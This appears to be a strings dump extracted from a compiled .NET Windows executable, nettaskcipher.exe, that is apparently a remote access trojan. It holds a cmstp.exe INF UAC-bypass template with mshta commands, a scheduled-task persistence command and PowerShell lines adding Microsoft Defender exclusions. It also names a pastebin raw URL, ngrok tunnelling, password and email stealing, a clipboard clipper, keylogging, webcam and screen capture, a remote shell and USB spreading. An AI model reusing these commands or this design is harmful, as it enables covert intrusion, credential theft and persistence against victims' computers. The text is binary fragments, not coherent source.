!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<Module>
mscorlib
Microsoft.VisualBasic
MyApplication
MyComputer
MyProject
MyWebServices
ThreadSafeObjectProvider`1
GetTickCount
ProcessCritical
ClientSocket
Messages
Helper
screen_preview
AppendOutputTextDelegate
EXECUTION_STATE
GetWindowCmd
Microsoft.VisualBasic.ApplicationServices
ApplicationBase
Microsoft.VisualBasic.Devices
Computer
System
Object
.cctor
get_Computer
m_ComputerObjectProvider
get_Application
m_AppObjectProvider
get_User
m_UserObjectProvider
get_WebServices
m_MyWebServicesObjectProvider
Application
WebServices
Equals
GetHashCode
GetType
ToString
Create__Instance__
instance
Dispose__Instance__
get_GetInstance
m_ThreadStaticValue
GetInstance
TLS_DHE_PSK_WITH_AES_128_CBC_SHA
TLS_DHE_PSK_WITH_AES_256_CBC_SHA
TLS_DHE_RSA_WITH_AES_128_CBC_SHA
TLS_DHE_RSA_WITH_AES_256_CBC_SHA
TLS_PSK_WITH_AES_128_CBC_SHA
TLS_PSK_WITH_AES_256_CBC_SHA
TLS_RSA_PSK_WITH_AES_128_CBC_SHA
TLS_RSA_PSK_WITH_AES_256_CBC_SHA
TLS_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_AES_256_CBC_SHA
TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA
TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA
TLS_SRP_SHA_WITH_AES_128_CBC_SHA
TLS_SRP_SHA_WITH_AES_256_CBC_SHA
TLS_DHE_PSK_WITH_AES_128_CBC_SHA256
TLS_DHE_PSK_WITH_AES_256_CBC_SHA384
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA
TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA256
TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA
TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA384
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
TLS_PSK_WITH_AES_128_CBC_SHA256
TLS_PSK_WITH_AES_256_CBC_SHA384
TLS_RSA_PSK_WITH_AES_128_CBC_SHA256
TLS_RSA_PSK_WITH_AES_256_CBC_SHA384
TLS_DHE_PSK_WITH_AES_128_GCM_SHA256
TLS_DHE_PSK_WITH_AES_256_GCM_SHA384
TLS_DHE_PSK_WITH_CHACHA20_POLY1305_SHA256
TLS_DHE_RSA_WITH_AES_128_CBC_SHA256
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
TLS_ECDHE_PSK_WITH_CHACHA20_POLY1305_SHA256
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
TLS_PSK_WITH_AES_128_GCM_SHA256
TLS_PSK_WITH_AES_256_GCM_SHA384
TLS_PSK_WITH_CHACHA20_POLY1305_SHA256
TLS_RSA_PSK_WITH_AES_128_GCM_SHA256
TLS_RSA_PSK_WITH_AES_256_GCM_SHA384
TLS_RSA_PSK_WITH_CHACHA20_POLY1305_SHA256
TLS_RSA_WITH_AES_128_CBC_SHA256
TLS_RSA_WITH_AES_128_GCM_SHA256
TLS_RSA_WITH_AES_256_CBC_SHA256
TLS_RSA_WITH_AES_256_GCM_SHA384
TLS_AES_128_GCM_SHA256
TLS_AES_256_GCM_SHA384
TLS_CHACHA20_POLY1305_SHA256
TLS_AES_128_CCM_SHA256
TLS_AES_128_CCM_8_SHA256
hosting
TaskName
Mutexx
System.Threading
_appMutex
current
AdminCheck
PostMessageW
wParam
lParam
user32.dll
FindWindowEx
parentHandle
childAfter
lclassName
windowTitle
user32
SetInfFile
CommandToExecute
Execute
BinaryPath
SetCurrentProcessIsCritical
isCritical
refWasCritical
needSystemCriticalBreaks
Microsoft.Win32
SessionEndingEventArgs
SystemEvents_SessionEnding
sender
CriticalProcess_Enable
CriticalProcesses_Disable
isConnected
System.Net.Sockets
Socket
BufferLength
BufferLengthReceived
Buffer
System.IO
MemoryStream
ManualResetEvent
allDone
SendSync
BeginConnect
IAsyncResult
BeginReceive
BeginRead
EndSend
isDisconnected
System.Diagnostics
Process
_MyProcess
get_MyProcess
set_MyProcess
WithEventsValue
processid
AppendOutputText
DataReceivedEventArgs
MyProcess_ErrorDataReceived
MyProcess_OutputDataReceived
WSound
mouse_event
dwFlags
cButtons
dwExtraInfo
keybd_event
Thread
capCreateCaptureWindowA
lpszWindowName
dwStyle
nWidth
nHeight
hwndParent
Handle
capGetDriverDescriptionA
wDriver
lpszName
cbName
lpszVer
getFolders
location
getFiles
getDrives
Download
MyProcess
SetThreadExecutionState
esFlags
PreventSleep
GetHashT
strToHash
frombase64
Plugin
AES_Encryptor
AES_Decryptor
INDATE
gettag
Comment
Random
GetWindow
GetParent
SetFocusAPI
SetForegroundWindow
GetBIT
Antivirus
CreateMutex
CloseMutex
userAgents
IPHOST
PortHost
IsValid
Address
SystemParametersInfo
uAction
uParam
pvParam
fWinIni
SystemParametersInfoA
BitBlt
nXDest
nYDest
hdcSrc
gdi32.dll
System.Drawing
Capture
System.Drawing.Imaging
ImageCodecInfo
GetEncoderInfo
MulticastDelegate
TargetObject
TargetMethod
AsyncCallback
BeginInvoke
DelegateCallback
DelegateAsyncState
EndInvoke
DelegateAsyncResult
Invoke
value__
ES_CONTINUOUS
ES_DISPLAY_REQUIRED
ES_SYSTEM_REQUIRED
GW_HWNDFIRST
GW_HWNDLAST
GW_HWNDNEXT
GW_HWNDPREV
GW_OWNER
GW_CHILD
GW_ENABLEDPOPUP
System.ComponentModel
EditorBrowsableAttribute
EditorBrowsableState
System.CodeDom.Compiler
GeneratedCodeAttribute
DebuggerHiddenAttribute
Microsoft.VisualBasic.CompilerServices
StandardModuleAttribute
HideModuleNameAttribute
System.ComponentModel.Design
HelpKeywordAttribute
System.Runtime.CompilerServices
RuntimeHelpers
GetObjectValue
RuntimeTypeHandle
GetTypeFromHandle
Activator
CreateInstance
MyGroupCollectionAttribute
System.Runtime.InteropServices
ComVisibleAttribute
ThreadStaticAttribute
CompilerGeneratedAttribute
GetCurrentProcess
ProcessModule
get_MainModule
get_FileName
VB$AnonymousDelegate_0
_Lambda$__1
DebuggerDisplayAttribute
Interaction
Environ
String
Concat
Exception
ProcessStartInfo
Environment
GetFileName
ReadAllBytes
WriteAllBytes
ProjectData
SetProjectError
ClearProjectError
ProcessWindowStyle
set_WindowStyle
GetFileNameWithoutExtension
set_Arguments
WaitForExit
set_FileName
get_ModuleName
ThreadStart
System.Security.Principal
WindowsIdentity
GetCurrent
WindowsPrincipal
WindowsBuiltInRole
IsInRole
System.Text
StringBuilder
GetRandomFileName
Convert
ToChar
Append
Replace
WriteAllText
Exists
IntPtr
op_Explicit
WaitHandle
WaitOne
STAThreadAttribute
MarshalAsAttribute
UnmanagedType
SessionEndingEventHandler
SystemEvents
add_SessionEnding
EnterDebugMode
DllImportAttribute
NTdll.dll
RtlSetProcessIsCritical
_Lambda$__2
_Lambda$__3
DebuggerStepThroughAttribute
TimerCallback
AddressFamily
SocketType
ProtocolType
set_ReceiveBufferSize
set_SendBufferSize
Conversions
ToInteger
Connect
SocketFlags
EventWaitHandle
ComputerInfo
get_MachineName
get_OSFullName
Boolean
System.Net
WebClient
DownloadString
EndReceive
ToArray
ToLong
Stream
Dispose
WriteByte
get_Length
WaitCallback
ThreadPool
QueueUserWorkItem
ObjectFlowControl
CheckForSyncLockOnValueType
Monitor
SelectMode
BeginSend
IDisposable
HttpWebRequest
HttpWebResponse
ServicePointManager
set_Expect100Continue
SecurityProtocolType
set_SecurityProtocol
set_DefaultConnectionLimit
WebRequest
Create
set_UserAgent
WebResponse
GetResponse
GetResponseStream
StreamReader
ReadToEnd
Collect
_Closure$__1
$VB$Local_A
_Lambda$__6
_Lambda$__4
_Lambda$__5
DataReceivedEventHandler
remove_OutputDataReceived
remove_ErrorDataReceived
add_OutputDataReceived
add_ErrorDataReceived
Operators
AddObject
get_Data
StreamWriter
Bitmap
FileAttribute
Rectangle
DateTime
System.Collections
IEnumerator
Strings
CompareMethod
CompareString
System.Windows.Forms
Restart
SocketShutdown
Shutdown
NewLateBinding
LateCall
ChangeType
Screen
get_PrimaryScreen
get_Bounds
get_Size
ConcatenateObject
LateGet
Cursor
set_Position
ToBoolean
ToByte
UIntPtr
GetTempFileName
DownloadFile
CreateObject
LateSet
AppWinStyle
ToInt32
get_StartInfo
set_UseShellExecute
set_RedirectStandardError
set_RedirectStandardOutput
set_CreateNoWindow
set_RedirectStandardInput
get_Id
BeginErrorReadLine
BeginOutputReadLine
get_StartTime
get_StandardInput
TextWriter
WriteLine
GetProcesses
get_ProcessName
GetExtension
GetProcessById
Delete
Directory
ServerComputer
Microsoft.VisualBasic.MyServices
FileSystemProxy
get_FileSystem
RenameDirectory
RenameFile
ReadAllText
GetThumbnailImageAbort
GetThumbnailImage
ImageFormat
get_Png
FileSystem
SetAttr
CreateDirectory
FileStream
ToBase64String
GetTempPath
CopyDirectory
MoveDirectory
get_Audio
Registry
GetValue
IEnumerable
GetEnumerator
get_Current
MoveNext
Network
get_Network
MessageBox
DialogResult
UploadFile
SetValue
DirectoryInfo
GetDirectories
get_Name
FileInfo
GetFiles
DriveInfo
System.Collections.Generic
IEnumerator`1
DriveType
System.Collections.ObjectModel
ReadOnlyCollection`1
get_Drives
get_DriveType
avicap32.dll
AccessedThroughPropertyAttribute
_Lambda$__7
Encoding
get_Default
GetBytes
GetString
get_ProcessorCount
get_UserName
OperatingSystem
get_OSVersion
get_SystemDirectory
GetPathRoot
get_TotalSize
System.Security.Cryptography
MD5CryptoServiceProvider
get_ASCII
HashAlgorithm
ComputeHash
Substring
ToUpper
FromBase64String
System.Reflection
Module
Assembly
GetModules
GetTypes
get_FullName
EndsWith
get_Assembly
RijndaelManaged
ICryptoTransform
SymmetricAlgorithm
set_Key
CipherMode
set_Mode
CreateEncryptor
TransformFinalBlock
CreateDecryptor
FileSystemInfo
get_LastWriteTime
get_Info
get_TotalPhysicalMemory
UInt64
Conversion
Double
Remove
RegistryKey
LocalMachine
OpenSubKey
Contains
System.Management
ManagementObject
ManagementBaseObject
get_Item
ManagementObjectSearcher
ManagementObjectCollection
ManagementObjectEnumerator
IPHostEntry
IPAddress
GetHostName
GetHostEntry
get_AddressList
get_AddressFamily
get_DnsSafeHost
get_UTF8
kernel32.dll
EncoderParameter
EncoderParameters
Graphics
get_Width
get_Height
FromImage
FromHwnd
GetHdc
ReleaseHdc
Cursors
get_Position
op_Inequality
Encoder
Quality
get_Param
GetImageEncoders
get_MimeType
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
GuidAttribute
AssemblyFileVersionAttribute
AssemblyTrademarkAttribute
AssemblyCopyrightAttribute
AssemblyProductAttribute
AssemblyCompanyAttribute
AssemblyDescriptionAttribute
AssemblyTitleAttribute
nettaskcipher
nettaskcipher.exe
MyTemplate
14.0.0.0
My.Application
My.User
My.WebServices
My.Computer
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
<generated method>
<generated method>
MyProcess
WrapNonExceptionThrows
$26b3b426-742e-4b41-a2c9-3361e7fa3a97
1.0.0.0
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
https://pastebin.com/raw/fB4ZyQEn
password
<SecureNgrok>
USBDriver.exe
jjcDBygdHXnsJ5oY
WinDir
\system32\cmstp.exe
appdata
schtasks.exe
/create /f /sc minute /mo 1 /tn "
" /tr "
powershell.exe
-ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '
-ExecutionPolicy Bypass Add-MpPreference -ExclusionPath '
REPLACE_COMMAND_LINE
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection
[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
mshta vbscript:Execute(###CreateObject(####WScript.Shell####).Run ####cmd.exe /c start ################ ########REPLACE_COMMAND_LINE############,0:close###)
mshta vbscript:Execute(###CreateObject(####WScript.Shell####).Run ####taskkill /IM cmstp.exe /F####, 0, true:close###)
[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7
[AllUSer_LDIDSection]
##HKLM##, ##SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE##, ##ProfileInstallPath##, ##%UnexpectedError%##, ####
[Strings]
ServiceName=##HM##
ShortSvcName=##HM##
Microsoft
http://ip-api.com/csv/?fields=status,query
127.0.0.1
Error:
uninstall
update
screenlive
Height
Memory
getinfo
openhide
internetexplorer.application
navigate
visible
shellfuc
regfuc
WScript.Shell
RegWrite
REG_DWORD
RunBotKiller
script
Cilpper
Clipper
injRun
startusb
startsp
taskkill.exe
/pid
CMD.EXE
Process Started at:
runnnnnn
closeshell
GetText
setText
clearr
BScreen
FILE_MANAGER_const
GetDrives
FileManager
Delete
Folder
Execute
Rename
txtttt
viewimage
hidefolderfile
showfolderfile
creatnewfolder
creatfile
downloadfile
downloadedfile
sendfileto
install
NETINS
7zip\7z.exe
InsProg
RSSDis
GETWCamPlu
GETWmicPlu
Wsound
GETWsoundPlu
JustFun
MapsPLU
closeKL
HKEY_CURRENT_USER\SOFTWARE\
GETTCP
GetActiveWindows
killAct
InstallN
InstallngC
\ngrok.exe
passwords_data
Getpass
Pvbnet
wd_kill
Emails
Error!
LLCHAT
[Folder]
FileManagerSplitFileManagerSplit
FileManagerSplit
[Drive]
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Unknown HWID
Class1
dd/MM/yyy
Activated
Not active
TLS (lev) /
HARDWARE\Description\System\CentralProcessor\0
Identifier
(64 Bit)
(32 Bit)
(Unknown)
Win32_Processor.deviceid="CPU0"
Core(TM)
Unknow
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
InterNetwork
POST / HTTP/1.1
Host:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
User-Agent:
Content-length: 5235
image/jpeg
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
1.0.0.0
InternalName
nettaskcipher.exe
LegalCopyright
OriginalFilename
nettaskcipher.exe
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0